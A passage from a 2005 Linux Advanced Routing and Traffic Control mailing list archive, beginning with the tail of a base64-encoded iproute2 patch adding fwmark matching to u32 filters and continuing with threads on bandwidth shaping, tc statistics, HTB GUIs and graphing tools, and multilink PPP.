ciAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLg0KICAqDQog ICogQXV0aG9yczoJQWxleGV5IEt1em5ldHNvdiwgPGt1em5ldEBtczIuaW5y LmFjLnJ1Pg0KKyAqCQlNYXRjaCBtYXJrIGFkZGVkIGJ5IENhdGFsaW4odXgg YWthIERpbm8pIEJPSUUgPGNhdGFiIGF0IHVtYnJlbGxhLnJvPiBbNSBub3Yg MjAwNF0NCiAgKg0KICAqLw0KIA0KQEAgLTMzLDcgKzM0LDcgQEAgc3RhdGlj IHZvaWQgZXhwbGFpbih2b2lkKQ0KIAlmcHJpbnRmKHN0ZGVyciwgIm9yICAg ICAgICAgdTMyIGRpdmlzb3IgRElWSVNPUlxuIik7DQogCWZwcmludGYoc3Rk ZXJyLCAiXG4iKTsNCiAJZnByaW50ZihzdGRlcnIsICJXaGVyZTogU0VMRUNU T1IgOj0gU0FNUExFIFNBTVBMRSAuLi5cbiIpOw0KLQlmcHJpbnRmKHN0ZGVy ciwgIiAgICAgICBTQU1QTEUgOj0geyBpcCB8IGlwNiB8IHVkcCB8IHRjcCB8 IGljbXAgfCB1ezMyfDE2fDh9IH0gU0FNUExFX0FSR1NcbiIpOw0KKwlmcHJp bnRmKHN0ZGVyciwgIiAgICAgICBTQU1QTEUgOj0geyBpcCB8IGlwNiB8IHVk cCB8IHRjcCB8IGljbXAgfCB1ezMyfDE2fDh9IHwgbWFyayB9IFNBTVBMRV9B UkdTXG4iKTsNCiAJZnByaW50ZihzdGRlcnIsICIgICAgICAgRklMVEVSSUQg Oj0gWDpZOlpcbiIpOw0KIH0NCiANCkBAIC01OTAsOSArNTkxLDQyIEBAIGRv bmU6DQogCXJldHVybiByZXM7DQogfQ0KIA0KK3N0YXRpYyBpbnQgcGFyc2Vf bWFyayhpbnQgKmFyZ2NfcCwgY2hhciAqKiphcmd2X3AsIHN0cnVjdCBubG1z Z2hkciAqbikNCit7DQorCWludCByZXMgPSAtMTsNCisJaW50IGFyZ2MgPSAq YXJnY19wOw0KKwljaGFyICoqYXJndiA9ICphcmd2X3A7DQorCXN0cnVjdCB0 Y191MzJfbWFyayBtYXJrOw0KKw0KKwlpZiAoYXJnYyA8PSAxKQ0KKwkJcmV0 dXJuIC0xOw0KKw0KKwlpZiAoZ2V0X3UzMigmbWFyay52YWwsICphcmd2LCAw KSkgew0KKwkJZnByaW50ZihzdGRlcnIsICJJbGxlZ2FsIFwibWFya1wiIHZh bHVlXG4iKTsNCisJCXJldHVybiAtMTsNCisJfQ0KKwlORVhUX0FSRygpOw0K Kw0KKwlpZiAoZ2V0X3UzMigmbWFyay5tYXNrLCAqYXJndiwgMCkpIHsNCisJ CWZwcmludGYoc3RkZXJyLCAiSWxsZWdhbCBcIm1hcmtcIiBtYXNrXG4iKTsN CisJCXJldHVybiAtMTsNCisJfQ0KKwlORVhUX0FSRygpOw0KKw0KKwlpZiAo KG1hcmsudmFsICYgbWFyay5tYXNrKSAhPSBtYXJrLnZhbCkgew0KKwkJZnBy aW50ZihzdGRlcnIsICJJbGxlZ2FsIFwibWFya1wiIChpbXBvc3NpYmxlIGNv bWJpbmF0aW9uKVxuIik7DQorCQlyZXR1cm4gLTE7DQorCX0NCiANCisJYWRk YXR0cl9sKG4sIE1BWF9NU0csIFRDQV9VMzJfTUFSSywgJm1hcmssIHNpemVv ZihtYXJrKSk7DQorCXJlcyA9IDA7DQorDQorCSphcmdjX3AgPSBhcmdjOw0K KwkqYXJndl9wID0gYXJndjsNCisJcmV0dXJuIHJlczsNCit9DQogDQotc3Rh dGljIGludCBwYXJzZV9zZWxlY3RvcihpbnQgKmFyZ2NfcCwgY2hhciAqKiph cmd2X3AsIHN0cnVjdCB0Y191MzJfc2VsICpzZWwpDQorc3RhdGljIGludCBw YXJzZV9zZWxlY3RvcihpbnQgKmFyZ2NfcCwgY2hhciAqKiphcmd2X3AsIHN0 cnVjdCB0Y191MzJfc2VsICpzZWwsIHN0cnVjdCBubG1zZ2hkciAqbikNCiB7 DQogCWludCBhcmdjID0gKmFyZ2NfcDsNCiAJY2hhciAqKmFyZ3YgPSAqYXJn dl9wOw0KQEAgLTY0MSw2ICs2NzUsMTIgQEAgc3RhdGljIGludCBwYXJzZV9z ZWxlY3RvcihpbnQgKmFyZ2NfcCwgYw0KIAkJcmVzID0gcGFyc2VfaWNtcCgm YXJnYywgJmFyZ3YsIHNlbCk7DQogCQlnb3RvIGRvbmU7DQogCX0NCisJaWYg KG1hdGNoZXMoKmFyZ3YsICJtYXJrIikgPT0gMCkgew0KKwkJTkVYVF9BUkco KTsNCisJCXJlcyA9IHBhcnNlX21hcmsoJmFyZ2MsICZhcmd2LCBuKTsNCisJ CWdvdG8gZG9uZTsNCisJfQ0KKw0KIAlyZXR1cm4gLTE7DQogDQogZG9uZToN CkBAIC03NjAsNyArODAwLDcgQEAgc3RhdGljIGludCB1MzJfcGFyc2Vfb3B0 KHN0cnVjdCBmaWx0ZXJfdQ0KIAl3aGlsZSAoYXJnYyA+IDApIHsNCiAJCWlm IChtYXRjaGVzKCphcmd2LCAibWF0Y2giKSA9PSAwKSB7DQogCQkJTkVYVF9B UkcoKTsNCi0JCQlpZiAocGFyc2Vfc2VsZWN0b3IoJmFyZ2MsICZhcmd2LCAm c2VsLnNlbCkpIHsNCisJCQlpZiAocGFyc2Vfc2VsZWN0b3IoJmFyZ2MsICZh cmd2LCAmc2VsLnNlbCwgbikpIHsNCiAJCQkJZnByaW50ZihzdGRlcnIsICJJ bGxlZ2FsIFwibWF0Y2hcIlxuIik7DQogCQkJCXJldHVybiAtMTsNCiAJCQl9 DQpAQCAtODM5LDcgKzg3OSw3IEBAIHN0YXRpYyBpbnQgdTMyX3BhcnNlX29w dChzdHJ1Y3QgZmlsdGVyX3UNCiAJCQkJc3RydWN0IHRjX3UzMl9rZXkga2V5 c1s0XTsNCiAJCQl9IHNlbDI7DQogCQkJTkVYVF9BUkcoKTsNCi0JCQlpZiAo cGFyc2Vfc2VsZWN0b3IoJmFyZ2MsICZhcmd2LCAmc2VsMi5zZWwpKSB7DQor CQkJaWYgKHBhcnNlX3NlbGVjdG9yKCZhcmdjLCAmYXJndiwgJnNlbDIuc2Vs LCBuKSkgew0KIAkJCQlmcHJpbnRmKHN0ZGVyciwgIklsbGVnYWwgXCJzYW1w bGVcIlxuIik7DQogCQkJCXJldHVybiAtMTsNCiAJCQl9DQpAQCAtOTY0LDEx ICsxMDA0LDIyIEBAIHN0YXRpYyBpbnQgdTMyX3ByaW50X29wdChzdHJ1Y3Qg ZmlsdGVyX3UNCiAJCXBmID0gUlRBX0RBVEEodGJbVENBX1UzMl9QQ05UXSk7 DQogCX0NCiANCisJaWYgKHNlbCAmJiBzaG93X3N0YXRzICYmIE5VTEwgIT0g cGYpDQorCQlmcHJpbnRmKGYsICIgKHJ1bGUgaGl0ICVsbHUgc3VjY2VzcyAl bGx1KSIscGYtPnJjbnQscGYtPnJoaXQpOw0KKw0KKwlpZiAodGJbVENBX1Uz Ml9NQVJLXSkgew0KKwkJc3RydWN0IHRjX3UzMl9tYXJrICptYXJrID0gUlRB X0RBVEEodGJbVENBX1UzMl9NQVJLXSk7DQorCQlpZiAoUlRBX1BBWUxPQUQo dGJbVENBX1UzMl9NQVJLXSkgPCBzaXplb2YoKm1hcmspKSB7DQorCQkJZnBy aW50ZihmLCAiXG4gIEludmFsaWQgbWFyayAoa2VybmVsJmlwcm91dGUyIG1p c21hdGNoKVxuIik7DQorCQl9IGVsc2Ugew0KKwkJCWZwcmludGYoZiwgIlxu ICBtYXJrIDB4JTA0eCAweCUwNHggKHN1Y2Nlc3MgJWQpIiwNCisJCQkJbWFy ay0+dmFsLCBtYXJrLT5tYXNrLCBtYXJrLT5zdWNjZXNzKTsNCisJCX0NCisJ fQ0KKw0KIAlpZiAoc2VsKSB7DQogCQlpbnQgaTsNCiAJCXN0cnVjdCB0Y191 MzJfa2V5ICprZXkgPSBzZWwtPmtleXM7DQotCQlpZiAoc2hvd19zdGF0cyAm JiBOVUxMICE9IHBmKQ0KLQkJCWZwcmludGYoZiwgIiAocnVsZSBoaXQgJWxs dSBzdWNjZXNzICVsbHUpIixwZi0+cmNudCxwZi0+cmhpdCk7DQogCQlpZiAo c2VsLT5ua2V5cykgew0KIAkJCWZvciAoaT0wOyBpPHNlbC0+bmtleXM7IGkr Kywga2V5KyspIHsNCiAJCQkJZnByaW50ZihmLCAiXG4gIG1hdGNoICUwOHgv JTA4eCBhdCAlcyVkIiwNCi0tLSBpcHJvdXRlMi0yLjYuOS9pbmNsdWRlL2xp bnV4L3BrdF9jbHMuaC5vcmlnCTIwMDQtMTEtMDQgMTU6NDI6MjcuMDAwMDAw MDAwICswMjAwDQorKysgaXByb3V0ZTItMi42LjkvaW5jbHVkZS9saW51eC9w a3RfY2xzLmgJMjAwNC0xMS0wOSAxMzo1ODoxNS4wMDAwMDAwMDAgKzAyMDAN CkBAIC0xOTAsNiArMTkwLDcgQEAgZW51bQ0KIAlUQ0FfVTMyX0FDVCwgICAN CiAJVENBX1UzMl9JTkRFViwNCiAJVENBX1UzMl9QQ05ULA0KKwlUQ0FfVTMy X01BUkssDQogCV9fVENBX1UzMl9NQVgNCiB9Ow0KIA0KQEAgLTIyNCw2ICsy MjUsMTQgQEAgc3RydWN0IHRjX3UzMl9wY250DQogCV9fdTY0IHJoaXQ7DQog CV9fdTY0IGtjbnRzWzBdOw0KIH07DQorDQorc3RydWN0IHRjX3UzMl9tYXJr DQorew0KKwlfX3UzMgl2YWw7DQorCV9fdTMyCW1hc2s7DQorCV9fdTMyCXN1 Y2Nlc3M7DQorfTsNCisNCiAvKiBGbGFncyAqLw0KIA0KICNkZWZpbmUgVENf VTMyX1RFUk1JTkFMCQkxDQo= ---1646943047-595155148-1104919507=:9453-- From lartc@draxinusom.ch Wed Jan 5 12:07:26 2005 From: lartc@draxinusom.ch (Rene Gallati) Date: Wed, 05 Jan 2005 13:07:26 +0100 Subject: [LARTC] Sharing/splitting bandwidth on a link while bandwidth of the link is variable (or unknown) ? In-Reply-To: <20050105090941.73415.qmail@web51608.mail.yahoo.com> References: <20050105090941.73415.qmail@web51608.mail.yahoo.com> Message-ID: <41DBD87E.6060807@draxinusom.ch> Hello, > I want to share/split bandwidth on a link with unknown bandwidth. I > want to exactly > share/split bandwidth (for example : FTP 30% , HTTP 20% or 30% for > a group of PCs and so forth.) > > "Traffic-Control-HOWTO" talk that PRIO scheduler is an ideal match for > "Handling a link with a variable (or unknown) bandwidth". > > But PRIO scheduler can not exactly share/split bandwidth . > > Could you tell me if I can exactly share/split bandwidth on a link with > a variable (or unknown) bandwidth? If it is possible, how can I do that ? [Warning irony ahead] I'll give you a complete script if you tell me how many bits/sec exactly 30% of unknown is. [/irony] In other words: You don't know how much there is available, I don't know it, the list doesn't know it and your computer can't know it either. So no - that's not possible (and should be evident, hopefully) What you CAN do is let some ping run alongside and react to changes in the latency it sees across the link - then adapt the script and thus changing the parameters. This needs lot of experimentation, is a bad hack but maybe it is sufficient for what you are trying to achieve. Otherwise, find a minimum value of bandwidth you never drop below and set that as the maximum bandwidth available for your root qdisc. This gives you the predictability. Or : find a better line/ISP. Find and drop abusive users/applications. But all in all, there's not much you can actually do in your situation. -- C U - -- ---- ----- -----/\/ René Gallati \/\---- ----- --- -- - From msuzen@kibris.net Wed Jan 5 14:25:12 2005 From: msuzen@kibris.net (Mehmet Ali Suzen) Date: Wed, 5 Jan 2005 16:25:12 +0200 (EET) Subject: [LARTC] tc and ntop inconsistent trafic. Message-ID: <37621.212.175.247.7.1104935112.squirrel@webmail2.kibris.net> Dear List, I am trying to limit some IP blocs with tc with following three step. # interface tc qdisc add dev eth0 root handle 1: cbq avpkt 1000 bandwidth 256kbit # class tc class add dev eth0 parent 1: classid 1:1 cbq rate 64kbit \ allot 1500 prio 5 bounded isolated # rules # download tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ match ip dst 10.0.1.0/24 flowid 1:1 # upload tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ match ip src 10.0.1.0/24 flowid 1:1 Problem is when I try to measure traffic with ntop (www.ntop.org), it is seen that overall traffic which that ip block handles is much higher then 64kbit, actually it is about 500Kbps which is not what I want !. tc -s class show dev eth0 shows that I got the following [root@nat root]# /usr/local/sbin/traffic-limit.sh status class cbq 1: root rate 168Kbit (bounded,isolated) prio no-transmit Sent 6068639 bytes 5841 pkts (dropped 0, overlimits 0) borrowed 0 overactions 0 avgidle 38094 undertime 0 class cbq 1:1 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 1460691 bytes 3174 pkts (dropped 0, overlimits 12339) borrowed 0 overactions 1372 avgidle -115477 undertime -33146 class cbq 1:2 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 2336291 bytes 3192 pkts (dropped 0, overlimits 32606) borrowed 0 overactions 2376 avgidle 38094 undertime 0 class cbq 1:3 parent 1: rate 84Kbit (bounded,isolated) prio 5 Sent 3125820 bytes 4851 pkts (dropped 0, overlimits 1053) borrowed 0 overactions 521 avgidle 2631 undertime 0 class cbq 1:4 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 217663 bytes 496 pkts (dropped 0, overlimits 3553) borrowed 0 overactions 363 avgidle -195655 undertime -8.22928e+08 Many thanks for any kind of comment why it is different? -Mehmet From dseshadri@broadbandmaritime.com Wed Jan 5 14:55:46 2005 From: dseshadri@broadbandmaritime.com (Deepak Seshadri) Date: Wed, 5 Jan 2005 09:55:46 -0500 Subject: [LARTC] TC GUI or graphs? Message-ID: <200501051455.j05Etk3f083069@jkcpub.iserver.net> Hello everybody, I am new to the lartc mailing list. I have been using "tc" for some time now. To be precise, tc & HTB to shape traffic. I did a lot of search on Google for 2 things: - A GUI to create configure new qdiscs & classes for HTB - A utility that will graph the data sent through all configured classes or qdiscs. I could not find anything. Could someone tell me if a GUI exists or a graphing utility for tc? If my post is a repeat, could someone tell me where the archive is? I'll search the archive, before posting here. Thank you, Deepak Seshadri From andy.furniss@dsl.pipex.com Wed Jan 5 14:59:44 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 05 Jan 2005 14:59:44 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: References: Message-ID: <41DC00E0.2070300@dsl.pipex.com> Catalin(ux aka Dino) BOIE wrote: > Hello, Stephen, List! > > Attached is the patch for iproute2 to add the possibility to use fwmark > in u32 filters. > The kernel part was included in 2.6.10. > > Please apply! > Thank you! > > For more info: > - Kernel patch (not needed for 2.6.10): > http://kernel.umbrella.ro/net/mark_in_u32/net-match-nfmark-in-u32.patch > > - Examples: > http://kernel.umbrella.ro/net/mark_in_u32/examples.txt > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ That looks handy :-) Do you know why fw mark doesn't work with policers in 2.6 (assuming it's not just me) To stephen - I may be wrong here but in the readme it says that default kernel include is /usr/src/linux/include but if I grep for KERNEL_INCLUDE I see :- ./Makefile:KERNEL_INCLUDE:=/usr/include ./Makefile:CFLAGS = $(CCOPTS) -I$(KERNEL_INCLUDE) -I../include $(DEFINES) ./Makefile: ./configure $(KERNEL_INCLUDE) ./README:KERNEL_INCLUDE should point to correct linux kernel include directory. ISTR having to mess about a bit last time when applying esfq patch to get it to work. Andy. From tgraf@suug.ch Wed Jan 5 15:10:26 2005 From: tgraf@suug.ch (Thomas Graf) Date: Wed, 5 Jan 2005 16:10:26 +0100 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DC00E0.2070300@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> Message-ID: <20050105151026.GR26856@postel.suug.ch> > That looks handy :-) Do you know why fw mark doesn't work with policers > in 2.6 (assuming it's not just me) Be prepared to see it removed again in favour of the meta extended match. Don't rely too much on it. Regarding fw, what exactly is not working? fw doesn't handle police results properly, the patchset at http://people.suug.ch/~tgr/patches/pending/ fixes this. Given its another issue, I would be curious to know what exactly is not working. > ISTR having to mess about a bit last time when applying esfq patch to > get it to work. Would you guys like to see esfq included in mainline? From andy.furniss@dsl.pipex.com Wed Jan 5 15:25:12 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 05 Jan 2005 15:25:12 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <20050105151026.GR26856@postel.suug.ch> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> Message-ID: <41DC06D8.70301@dsl.pipex.com> Thomas Graf wrote: >>That looks handy :-) Do you know why fw mark doesn't work with policers >>in 2.6 (assuming it's not just me) > > > Be prepared to see it removed again in favour of the meta extended > match. Don't rely too much on it. I searched a bit around meta data recently but couldn't find much - do you have any links? > > Regarding fw, what exactly is not working? fw doesn't handle police > results properly, the patchset at http://people.suug.ch/~tgr/patches/pending/ > fixes this. Given its another issue, I would be curious to know what > exactly is not working. It was for a test I did, though I notice some of the diffserv examples use it aswell (albeit with ipchains). http://marc.theaimsgroup.com/?l=lartc&m=110122532022827&w=2 > > >>ISTR having to mess about a bit last time when applying esfq patch to >>get it to work. > > > Would you guys like to see esfq included in mainline? > Yea - that would be great :-) Andy. From tgraf@suug.ch Wed Jan 5 15:52:50 2005 From: tgraf@suug.ch (Thomas Graf) Date: Wed, 5 Jan 2005 16:52:50 +0100 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DC06D8.70301@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> Message-ID: <20050105155250.GA17836@postel.suug.ch> * Andy Furniss <41DC06D8.70301@dsl.pipex.com> 2005-01-05 15:25 > Thomas Graf wrote: > >>That looks handy :-) Do you know why fw mark doesn't work with policers > >>in 2.6 (assuming it's not just me) > > > > > >Be prepared to see it removed again in favour of the meta extended > >match. Don't rely too much on it. > > I searched a bit around meta data recently but couldn't find much - do > you have any links? http://oss.sgi.com/archives/netdev/2004-12/msg00767.html http://oss.sgi.com/archives/netdev/2005-01/msg00028.html > http://marc.theaimsgroup.com/?l=lartc&m=110122532022827&w=2 Do you see the police/action stats being updated? i.e. does the matching itself work? Ingress qdisc reads from prerouting hook as well, might be a priority issue. From Joe Nuts Wed Jan 5 15:55:51 2005 From: Joe Nuts (Joe Nuts) Date: Wed, 5 Jan 2005 09:55:51 -0600 Subject: [LARTC] Load Balance Outbound AND Inbound Internet Traffic to one location over multiple links In-Reply-To: <41CF1920.6040307@dsl.pipex.com> References: <41C97943.3000003@dsl.pipex.com> <41CF1920.6040307@dsl.pipex.com> Message-ID: Thanks again for the response, Andy. I've done a tremendous amount of research, and set-up to test the multi-link ppp, and I still have not been successful in my search. The problem i've found out from working with ppp, and pppoe, is that I can only create a ppp connection between two devices on the same broadcast network. I.E. two devices connected by some kind of bridged ethernet. This wouldnt be an option for me, because the DSL connections to the client make it to the ISP over an ATM line, directly to a router. The router plugs in to a layer-2 switch, which then our server plugs in to. I would need to create maybe a GRE tunnel from the client to the server, so that the pppoe client requests would make it to the server, to then create the ppp connection. And that's just to get the one connection going, i'd like to be able to multilink multiple connections. If there were some way to multilink gre (or IPIP) tunnels, to get combined bandwith on single connections, that would be ideal. But I have not found any solutions along those lines. My next attempts will be multilink pppoe tunnels over gre tunnels, and I'm also researching what BSD has to offer in that arena. Any suggestions are welcome. Thanks -Joe Comeaux On Sun, 26 Dec 2004 20:03:44 +0000, Andy Furniss wrote: > Joe Nuts wrote: > > I have boxes at both ends of the link. I have spent my whole day > > searching the internet on anything to do with 'multilink ppp', and > > have not found any decent documentation on how to set something like > > that up. perhaps somone could point me to something? > > I am not sure about setting up a server, but there must be a few > examples of client setups around for ISDN. Here is one for DSL > > http://www.freestuffjunction.co.uk/bondedadsl.shtml > > > > As for the setup, server at the ISP has one public IP A, on public > > network A. it receives/routes traffic for public network B. > > the server at the client site has two public IP's, X and Y on public > > network X and Y. > > I would like for traffic sent to public network B to make it to client > > computer, divided across the two IP's X, and Y. (this traffic will of > > course go through server at the ISP, which will do the work in > > splitting the traffic up) > > You probably know more advanced routing than me - I have never played > about with complicated setups. As far as using ppp - I don't think you > have to worry about IP addresses too much - it's link level, so I think > you can send whatever you like down it and it will appear at the other end. > > Andy. > > From andy.furniss@dsl.pipex.com Wed Jan 5 16:40:32 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 05 Jan 2005 16:40:32 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <20050105155250.GA17836@postel.suug.ch> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> Message-ID: <41DC1880.6090405@dsl.pipex.com> Thomas Graf wrote: > * Andy Furniss <41DC06D8.70301@dsl.pipex.com> 2005-01-05 15:25 > >>Thomas Graf wrote: >> >>>>That looks handy :-) Do you know why fw mark doesn't work with policers >>>>in 2.6 (assuming it's not just me) >>> >>> >>>Be prepared to see it removed again in favour of the meta extended >>>match. Don't rely too much on it. >> >>I searched a bit around meta data recently but couldn't find much - do >>you have any links? > > > http://oss.sgi.com/archives/netdev/2004-12/msg00767.html > http://oss.sgi.com/archives/netdev/2005-01/msg00028.html Thanks. > > >>http://marc.theaimsgroup.com/?l=lartc&m=110122532022827&w=2 > > > Do you see the police/action stats being updated? i.e. does > the matching itself work? From memory yes - counters showed OK on iptables and tc -s qdisc ls dev eth0 just no drops I'll repeat tonight to be sure. Andy. > > Ingress qdisc reads from prerouting hook as well, might be > a priority issue. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From jasonb@edseek.com Wed Jan 5 16:52:13 2005 From: jasonb@edseek.com (Jason Boxman) Date: Wed, 5 Jan 2005 11:52:13 -0500 Subject: [LARTC] TC GUI or graphs? In-Reply-To: <200501051455.j05Etk3f083069@jkcpub.iserver.net> References: <200501051455.j05Etk3f083069@jkcpub.iserver.net> Message-ID: <200501051152.13693.jasonb@edseek.com> On Wednesday 05 January 2005 09:55, Deepak Seshadri wrote: > Hello everybody, > > I am new to the lartc mailing list. I have been using "tc" for some time > now. To be precise, tc & HTB to shape traffic. I did a lot of search on > Google for 2 things: > > - A GUI to create configure new qdiscs & classes for HTB There are two projects, the one I remember being lql, designed at creating libraries for plugging into netlink directly for QoS stuff. One of these days there will probably be a nice GUI available. Presently I don't know of any. > - A utility that will graph the data sent through all configured classes or > qdiscs. I hacked a Perl script[1] to graph shaping configuration leafs. It either writes values to a RRDTool database or sends the information off to Munin for it to play with. I briefly discuss usage in my traffic control guide[2]. [1] http://trekweb.com/~jasonb/code/polltc-1.01.tar.gz [2] http://trekweb.com/~jasonb/articles/traffic_shaping/monitoring.html > I could not find anything. Could someone tell me if a GUI exists or a > graphing utility for tc? If my post is a repeat, could someone tell me > where the archive is? I'll search the archive, before posting here. > -- Jason Boxman Perl Programmer / *NIX Systems Administrator Shimberg Center for Affordable Housing | University of Florida http://edseek.com/ - Linux and FOSS stuff From imipak@yahoo.com Wed Jan 5 16:59:20 2005 From: imipak@yahoo.com (Jonathan Day) Date: Wed, 5 Jan 2005 08:59:20 -0800 (PST) Subject: [LARTC] Sharing/splitting bandwidth on a link while bandwidth of the link is variable (or unknown) ? In-Reply-To: <41DBD87E.6060807@draxinusom.ch> Message-ID: <20050105165920.59898.qmail@web12307.mail.yahoo.com> In the past, people played with routing protocols such as HELLO and FUZZBALL which reacted to the latency on each link. They gave up. It turns out that overly reactive systems are not that useful. The gains are dubious, and the costs on resources are high. The other factor is in what the original poster meant by an "exact" split. Exact over what timeframe? Over any given instant, only one packet is being sent (it's a serial stream) so the split over that amount of time is always 100% of whatever it's doing. On the other hand, if it's an exact split over a fairly long timeslice, you use a class-based queueing system and measure what's been sent out of each queue. You then predict what the net bandwidth is over the whole timeslice, by looking at what gets sent and what gets dropped. Each time you adjust the prediction, you adjust the hard limits for the queues to allow out whatever is left of that class' net bandwidth. A third approach is to see what you can do with ECN and other back-propogating QoS protocols to throttle given queues that reach or exceed their limits. That way, you don't need to care what the bandwidths are at any given time, because the primary router that divvies up the bandwidth can throttle in proportion to how it does that division. --- Rene Gallati wrote: > Hello, > > > I want to share/split bandwidth on a link with > unknown bandwidth. I > > want to exactly > > share/split bandwidth (for example : FTP 30% , > HTTP 20% or 30% for > > a group of PCs and so forth.) > > > > "Traffic-Control-HOWTO" talk that PRIO scheduler > is an ideal match for > > "Handling a link with a variable (or unknown) > bandwidth". > > > > But PRIO scheduler can not exactly share/split > bandwidth . > > > > Could you tell me if I can exactly share/split > bandwidth on a link with > > a variable (or unknown) bandwidth? If it is > possible, how can I do that ? > > [Warning irony ahead] > I'll give you a complete script if you tell me how > many bits/sec exactly > 30% of unknown is. > [/irony] > > In other words: You don't know how much there is > available, I don't know > it, the list doesn't know it and your computer > can't know it either. > So no - that's not possible (and should be evident, > hopefully) > > What you CAN do is let some ping run alongside and > react to changes in > the latency it sees across the link - then adapt the > script and thus > changing the parameters. This needs lot of > experimentation, is a bad > hack but maybe it is sufficient for what you are > trying to achieve. > > Otherwise, find a minimum value of bandwidth you > never drop below and > set that as the maximum bandwidth available for your > root qdisc. This > gives you the predictability. > > Or : find a better line/ISP. Find and drop abusive > users/applications. > > But all in all, there's not much you can actually do > in your situation. > -- > > C U > > - -- ---- ----- -----/\/ René Gallati > \/\---- ----- --- -- - > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: > http://lartc.org/ > __________________________________ Do you Yahoo!? Yahoo! Mail - Easier than ever with enhanced search. Learn more. http://info.mail.yahoo.com/mail_250 From horst.graffy@wiesbaden.netsurf.de Wed Jan 5 17:08:30 2005 From: horst.graffy@wiesbaden.netsurf.de (Horst Graffy) Date: Wed, 5 Jan 2005 18:08:30 +0100 Subject: [LARTC] TC GUI or graphs? In-Reply-To: <200501051455.j05Etk3f083069@jkcpub.iserver.net> References: <200501051455.j05Etk3f083069@jkcpub.iserver.net> Message-ID: <200501051808.31084.horst.graffy@wiesbaden.netsurf.de> Am Mittwoch, 5. Januar 2005 15:55 schrieb Deepak Seshadri: > - A GUI to create configure new qdiscs & classes for HTB > - A utility that will graph the data sent through all configured classes or > qdiscs. > > I could not find anything. Could someone tell me if a GUI exists or a > graphing utility for tc? If my post is a repeat, could someone tell me > where the archive is? I'll search the archive, before posting here. have a look at: http://www.jarod.mpn.pl/htbgui.html http://www.zone.ee/ktc/ From imipak@yahoo.com Wed Jan 5 17:30:06 2005 From: imipak@yahoo.com (Jonathan Day) Date: Wed, 5 Jan 2005 09:30:06 -0800 (PST) Subject: [LARTC] TC GUI or graphs? In-Reply-To: <200501051152.13693.jasonb@edseek.com> Message-ID: <20050105173006.10237.qmail@web12302.mail.yahoo.com> There are GUIs for HTB, but no guarantee they'll work with current systems or with what you want to do. http://freshmeat.net/projects/easyshape/ http://freshmeat.net/projects/khtb/ http://freshmeat.net/projects/ktctool/ http://freshmeat.net/projects/bwmtools/ http://freshmeat.net/projects/htbgui/ http://freshmeat.net/projects/arbitrator/ http://freshmeat.net/projects/ibmonitor/ P.S. I rarely use Google to search for software. :) --- Jason Boxman wrote: > On Wednesday 05 January 2005 09:55, Deepak Seshadri > wrote: > > Hello everybody, > > > > I am new to the lartc mailing list. I have been > using "tc" for some time > > now. To be precise, tc & HTB to shape traffic. I > did a lot of search on > > Google for 2 things: > > > > - A GUI to create configure new qdiscs & classes > for HTB > > There are two projects, the one I remember being > lql, designed at creating > libraries for plugging into netlink directly for QoS > stuff. One of these > days there will probably be a nice GUI available. > Presently I don't know of > any. __________________________________ Do you Yahoo!? Yahoo! Mail - now with 250MB free storage. Learn more. http://info.mail.yahoo.com/mail_250 From jasonb@edseek.com Wed Jan 5 18:19:31 2005 From: jasonb@edseek.com (Jason Boxman) Date: Wed, 5 Jan 2005 13:19:31 -0500 Subject: [LARTC] Sharing/splitting bandwidth on a link while bandwidth of the link is variable (or unknown) ? In-Reply-To: <20050105165920.59898.qmail@web12307.mail.yahoo.com> References: <20050105165920.59898.qmail@web12307.mail.yahoo.com> Message-ID: <200501051319.31386.jasonb@edseek.com> On Wednesday 05 January 2005 11:59, Jonathan Day wrote: > On the other hand, if it's an exact split over a > fairly long timeslice, you use a class-based queueing > system and measure what's been sent out of each queue. > You then predict what the net bandwidth is over the > whole timeslice, by looking at what gets sent and what > gets dropped. Each time you adjust the prediction, you > adjust the hard limits for the queues to allow out > whatever is left of that class' net bandwidth. I wish there was something like that available for PPP over ATM links. My ADSL connection varies between 160Kbps and 224Kbps depending on how many ATM cells are wasted by mostly null cells. I'm stuck with a rate of 160Kbps since that's the lowest stable rate I could find that works under the worst case scenario of many, small Ethernet packets. Sadly I miss out when my connection is not in that worst state. From jan.rovner@diadema.cz Wed Jan 5 19:28:14 2005 From: jan.rovner@diadema.cz (Jan Rovner) Date: Wed, 5 Jan 2005 20:28:14 +0100 Subject: [LARTC] Shaping the sum of incoming and outgoing traffic Message-ID: Hello, does anyone have a working solution for the shaping both incoming and outgoing traffic in such way, that for a given client the *sum* of incoming and outgoing traffic is somehow defined? My ISP does the same thing, it gives me just a line of a defined rate, no matter the traffic direction (i.e. here is your line, the clock speed is 1024kbps, do what you want). I'm a litte bit familiar with HTB, my download shaping works fine. However, I would like shape both incoming+outgoing traffic in a way that the sum of actual outgoing and incoming rates=20 of all my clients would be always below the ISP's line speed in order to shaping get working. In other words, I would like to split the ISP's line into a bunch of hierarchical "virtual" lines with traffic borrowing etc. like HTB does for download, but with defined *total* rates 